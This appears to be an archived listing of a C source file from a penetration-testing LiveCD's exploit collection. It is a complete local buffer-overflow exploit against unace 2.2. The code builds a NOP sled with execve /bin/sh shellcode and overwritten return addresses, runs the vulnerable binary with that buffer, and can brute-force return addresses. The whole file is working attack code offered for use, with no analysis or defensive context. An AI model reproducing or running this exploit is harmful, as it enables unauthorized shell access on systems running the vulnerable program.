home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / packer / unace / unace-exp.c < prev   
Encoding:
C/C++ Source or Header  |  2005-02-12  |  4.3 KB  |  202 lines
  1. /*Local exploit for unace v2.2 by Li0n7
  2.  *Bug reported by Andreas Constantinides <megahz@megahz.org>
  3.  *contact me: Li0n7@voila.fr
  4.  *visit us: ioc.fr.st
  5.  *tested on slackware 9.0
  6.  *usage: ./unace-exp[-r <RET>][-b [-s <STARTING_RET>][-d <DIFF>]]
  7.  *-r <RET>: try to exploit unace with specified <RET> as return address
  8.  *-b:       enables bruteforcing
  9.  *-s:       specify the first address to bruteforce
  10.  *-d:       the value to take away from the starting address at each bruteforcing iteration
  11.  */
  12.  
  13.  
  14. #include <stdio.h>
  15. #include <stdlib.h>
  16. #include <unistd.h>
  17. #include <sys/wait.h>
  18. #include <sys/types.h>
  19. #include <errno.h>
  20.  
  21. #define BSIZE   600
  22. #define SIZE    BSIZE*2
  23. #define D_DIFF  1
  24. #define D_START 0xbfffffff
  25. #define PATH    "/tmp/test/exploits/src/unace"
  26. #define RET     0xbffff73a
  27.  
  28. char shellcode[]=
  29.       "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3"
  30.       "\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
  31.  
  32. char *buffer,*ptr;
  33.  
  34. void exec_culn();
  35. int tease();
  36. int make_string(long ret_addr);
  37. int bruteforce(long start,int diff);
  38. void banner(char *argv0);
  39.  
  40. int
  41. main(int argc,char *argv[])
  42. {
  43.       char * option_list = "bd:r:s:";
  44.       int option,brute = 0,opterr = 0,diff = D_DIFF;
  45.       long ret,start = D_START;
  46.  
  47.       banner(argv[0]);
  48.       if (argc < 1) exit(-1);
  49.  
  50.       while((option = getopt(argc,argv,option_list)) != -1)
  51.           switch(option)
  52.           {
  53.               case 'b':
  54.                   brute = 1;
  55.                   break;
  56.               case 'd':
  57.                   diff = atoi(optarg);
  58.                   break;
  59.               case 'r':
  60.                   ret = strtoul(optarg,NULL,0);
  61.                   make_string(ret);
  62.                   tease();
  63.                   exit(0);
  64.                   break;
  65.               case 's':
  66.                   start = strtoul(optarg,NULL,0);
  67.                   break;
  68.               case '?':
  69.                   fprintf(stderr,"[-] option \'%c\' invalid\n",optopt);
  70.                   banner(argv[0]);
  71.                   exit(-1);
  72.           }
  73.  
  74.       if(brute == 1)
  75.           bruteforce(start,diff);
  76.  
  77.       return 0;
  78. }
  79.  
  80. void
  81. exec_vuln()
  82. {
  83.       execl(PATH,PATH,"e",buffer,NULL);
  84. }
  85.  
  86.  
  87. int
  88. tease()
  89. {
  90.       pid_t pid;
  91.       pid_t wpid;
  92.       int status;
  93.  
  94.       pid = fork();
  95.  
  96.       if ( pid == -1 ) {
  97.           fprintf(stderr, " [-] %s: Failed to fork()\n", strerror(errno));
  98.           exit(13);
  99.  
  100.       } else if ( pid == 0 ) {
  101.  
  102.           exec_vuln();
  103.  
  104.       } else  {
  105.  
  106.          wpid = wait(&status);
  107.          if ( wpid == -1 ) {
  108.  
  109.              fprintf(stderr,"[-] %s: wait()\n", strerror(errno));
  110.              return 1;
  111.  
  112.          } else if ( wpid != pid )
  113.  
  114.              abort();
  115.  
  116.         else {
  117.  
  118.             if ( WIFEXITED(status) ) {
  119.  
  120.                 printf("[+] Exited: shell's ret code = %d\n", WEXITSTATUS(status));
  121.                 return WEXITSTATUS(status);
  122.  
  123.             } else if ( WIFSIGNALED(status) ) {
  124.  
  125.                 return WTERMSIG(status);
  126.             } else {
  127.  
  128.                 fprintf(stderr, "[-] Stopped.\n");
  129.  
  130.             }
  131.         }
  132.       }
  133.       return 1;
  134. }
  135.  
  136.  
  137. int
  138. make_string(long ret_addr)
  139. {
  140.       int i;
  141.       long ret,addr,*addr_ptr;
  142.  
  143.       buffer = (char *)malloc(SIZE);
  144.  
  145.       if(!buffer)
  146.       {
  147.           fprintf(stderr,"[-] Can't allocate memory, exiting...\n");
  148.           exit(-1);
  149.       }
  150.  
  151.       ptr = buffer;
  152.  
  153.       memset(ptr,0x90,BSIZE-strlen(shellcode));
  154.       ptr += BSIZE-strlen(shellcode);
  155.  
  156.       for(i=0;i<strlen(shellcode);i++)
  157.           *ptr++ = shellcode[i];
  158.  
  159.       addr_ptr = (long *)ptr;
  160.       for(i=0;i<100;i++)
  161.           *(addr_ptr++) = ret_addr;
  162.       ptr = (char *)addr_ptr;
  163.       *ptr = 0;
  164.  
  165.       return 0;
  166. }
  167.  
  168.  
  169. int
  170. bruteforce(long start,int diff)
  171. {
  172.       int ret;
  173.       long i;
  174.  
  175.       fprintf(stdout,"[+] Starting bruteforcing...\n");
  176.  
  177.       for(i=start;i<0;i=i-diff)
  178.       {
  179.           fprintf(stdout,"[+] Testing 0x%x...\n",i);
  180.           make_string(i);
  181.           ret=tease();
  182.           if(ret==0)
  183.           {
  184.               fprintf(stdout,"[+] Ret address found: 0x%x\n",i);
  185.               break;
  186.           }
  187.       }
  188.  
  189.       return 0;
  190. }
  191.  
  192. void
  193. banner(char *argv0)
  194. {
  195.       fprintf(stderr,"\n    local exploit for unace v <= 2.2 by Li0n7\n");
  196.       fprintf(stderr,"    vulnerability reported by Andreas Constantinides <megahz@megahz.org>\n");
  197.       fprintf(stderr,"    visit us: http://www.ioc.fr.st\n");
  198.       fprintf(stderr,"    contact me: Li0n7[at]voila[dot]fr\n");
  199.       fprintf(stderr,"    usage: %s [-r <RET>][-b [-s <STARTING_RET>][-d <DIFF>]]\n\n",argv0);
  200. }
  201.  
  202.